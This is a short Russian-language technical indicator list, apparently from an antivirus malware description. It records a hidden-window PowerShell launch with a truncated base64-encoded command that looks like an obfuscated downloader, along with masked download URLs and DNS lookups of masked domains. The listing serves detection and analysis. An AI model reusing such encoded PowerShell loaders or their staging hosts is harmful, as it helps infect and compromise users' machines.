Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFAHIAZgBxAG0AeQB5AD0AKAAnAE4AcgAnACsAKAAnAGgAJwArACcAMgBjACcAKQArACcAOQBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAUgBQAFIAbw...
- http://te####otebook.com/wp-includes/GTu/
- http://te###square.com/blog/zFj/
- http://te###null.com/journal/euW/
- DNS ASK te####otebook.com
- DNS ASK te###square.com
- DNS ASK te###null.com
- DNS ASK tv######lationofatlanta.com
- DNS ASK kr######ilindustries.com
- DNS ASK la##ebh.com
- DNS ASK sh###ocauca.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFAHIAZgBxAG0AeQB5AD0AKAAnAE4AcgAnACsAKAAnAGgAJwArACcAMgBjACcAKQArACcAOQBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAUgBQAFIAbw...' (со скрытым окном)